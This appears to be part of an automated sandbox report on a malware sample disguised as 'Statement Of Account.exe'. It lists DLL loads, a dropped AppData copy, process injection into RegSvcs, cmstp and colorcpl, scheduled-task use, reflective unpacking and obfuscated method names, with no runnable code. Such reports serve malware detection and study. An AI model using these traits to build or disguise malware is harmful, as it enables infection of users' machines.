Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Statement Of Account.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Statement Of Account.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Statement Of Account.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Statement Of Account.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: IuBP.pdb source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: IuBP.pdbSHA256 source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Statement Of Account.exe, Form1.cs .Net Code: InitializeComponent
Source: SdYCcXyq.exe.0.dr, Form1.cs .Net Code: InitializeComponent
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs .Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs .Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_014AF1D0 push esp; iretd 0_2_014AF1D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F709AD push ecx; mov dword ptr [esp], ecx 8_2_00F709B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F41FEC push eax; iretd 8_2_00F41FED
Source: C:\Windows\explorer.exe Code function: 9_2_0F424B02 push esp; retn 0000h 9_2_0F424B03
Source: C:\Windows\explorer.exe Code function: 9_2_0F424B1E push esp; retn 0000h 9_2_0F424B1F
Source: C:\Windows\explorer.exe Code function: 9_2_0F4249B5 push esp; retn 0000h 9_2_0F424AE7
Source: C:\Windows\explorer.exe Code function: 9_2_0F9079B5 push esp; retn 0000h 9_2_0F907AE7
Source: C:\Windows\explorer.exe Code function: 9_2_0F907B1E push esp; retn 0000h 9_2_0F907B1F
Source: C:\Windows\explorer.exe Code function: 9_2_0F907B02 push esp; retn 0000h 9_2_0F907B03
Source: C:\Windows\explorer.exe Code function: 9_2_109989B5 push esp; retn 0000h 9_2_10998AE7
Source: C:\Windows\explorer.exe Code function: 9_2_10998B1E push esp; retn 0000h 9_2_10998B1F
Source: C:\Windows\explorer.exe Code function: 9_2_10998B02 push esp; retn 0000h 9_2_10998B03
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_00DAF1D0 push esp; iretd 11_2_00DAF1D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00417024 push ecx; iretd 14_2_00417025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004170C2 push edx; ret 14_2_004170CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_004073EB push ebp; ret 14_2_004073EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00416CC8 push D1939A9Fh; retf 14_2_00416CCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D4B5 push eax; ret 14_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D56C push eax; ret 14_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D502 push eax; ret 14_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D50B push eax; ret 14_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148B008 push es; iretd 14_2_0148B009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148135E push eax; iretd 14_2_01481369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148225F pushad ; ret 14_2_014827F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014827FA pushad ; ret 14_2_014827F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01489939 push es; iretd 14_2_01489940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B09AD push ecx; mov dword ptr [esp], ecx 14_2_014B09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0148283D push eax; iretd 14_2_01482858
Source: Statement Of Account.exe Static PE information: section name: .text entropy: 7.029755289423976
Source: SdYCcXyq.exe.0.dr Static PE information: section name: .text entropy: 7.029755289423976
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Bcn4S3hlHm4ofn0hWj.cs High entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, IINHKBNMRCCi1qwcT4.cs High entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, zWJJGGvxAwIgbu8YWv.cs High entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, y8skBgpa9DSqAAHi65.cs High entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, KlLQrwBg4x55Bf4v3j.cs High entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs High entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, uoIQEWIyxOpt3scd2T.cs High entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs High entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, c3OREwnQa3GNYU832f.cs High entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, eKk7ynaiv2Ji3kdDNx.cs High entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vaiTpIWP0Ndo0ZuNPf.cs High entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, h6IC2siSXaigkWxfxe.cs High entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, taVahudoRs29QscL9X.cs High entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, FoLy8GswBljqbcaAATd.cs High entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vL6tORGBO4iNhhYxw5.cs High entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, TtlxsAzSTRsL7Foskh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
